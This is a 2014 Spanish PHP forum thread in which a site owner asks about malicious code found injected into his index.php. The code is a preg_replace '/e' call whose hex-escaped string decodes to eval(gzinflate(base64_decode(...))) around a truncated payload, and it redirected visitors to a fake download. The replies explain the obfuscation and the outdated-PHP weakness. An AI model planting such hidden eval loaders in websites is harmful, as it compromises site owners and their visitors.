Foros del Web » Programando para Internet » PHP »

Hackeo web.

Estas en el tema de Hackeo web. en el foro de PHP en Foros del Web. Muy buenas. Resulta que los del google han puesto en mi web el mensaje "Este sitio puede haber sido comprometido". He estado leyendo al respecto ...
  #1 (permalink)  
Antiguo 01/05/2014, 10:53
 
Fecha de Ingreso: octubre-2005
Mensajes: 31
Antigüedad: 18 años, 6 meses
Puntos: 2
Hackeo web.

Muy buenas. Resulta que los del google han puesto en mi web el mensaje "Este sitio puede haber sido comprometido". He estado leyendo al respecto y he encontrado que la página index.php me habían puesto un código al inicio que empieza así:

Código:
<?php ob_start(); ?>
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZ3JjuxMspz3AvQOPxq9kDYXRcaUiYbeJDbMCYKgXvRd6P799io67TOPKgkNaVE4p7Iyk2SED+bmQ/z1z//4x378848//u2//fGX+ef4+v7Z55+9ff+M+Wf75O
El código es muy largo y me redireccionaba a una web para descargar un supuesto fichero que necesitaba. Viendo la página con el caché de google también había una especie de texto médico al inicio.
He resubido una copia de seguridad y parece que se ha solucionado. Pero, ¿me podéis decir qué tipo de código es este y cómo es que me ha aparecido en la cabecera?

Gracias y un saludo.
  #2 (permalink)  
Antiguo 01/05/2014, 20:09
Avatar de Italico76  
Fecha de Ingreso: abril-2007
Mensajes: 3.303
Antigüedad: 17 años
Puntos: 292
Respuesta: Hackeo web.

Eso lo que hace es ejecutarte un codigo que esta ofuscado en hexadecimal.

Te ha pasado porque la version de PHP de tu servidor esta muy desactualizada: el parametro /e (PREG_REPLACE_EVAL) en esa funcion ya fue dejado de lado por cuestiones de seguridad (!)

http://stackoverflow.com/questions/1...regex-modifier
http://stackoverflow.com/questions/2...pression-flags
__________________
Salu2!
  #3 (permalink)  
Antiguo 02/05/2014, 00:10
 
Fecha de Ingreso: junio-2013
Ubicación: En cualquier parte de mi casa
Mensajes: 139
Antigüedad: 10 años, 10 meses
Puntos: 14
Respuesta: Hackeo web.

Me imagino que ese codigo malicioso fue ingresado a través de un formulario que posees! asi que te recomiendo usar filtros para eliminar posibles ataques! En los FAQ del foro hay uno que encontré una vez se que la funcion que realizo un usuario aca se llama filtroxss(); Debes buscarlo! Ve el lado bueno de los hackeos, te ponen en una situación que debes aprender cosas nuevas si o si!
  #4 (permalink)  
Antiguo 02/05/2014, 08:04
 
Fecha de Ingreso: octubre-2005
Mensajes: 31
Antigüedad: 18 años, 6 meses
Puntos: 2
Respuesta: Hackeo web.

Gracias por vuestras respuestas, voy a investigar y ver si puedo ir eliminando debilidades.
Un saludo.

Etiquetas: Ninguno
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta

SíEste tema le ha gustado a 1 personas




La zona horaria es GMT -6. Ahora son las 02:43.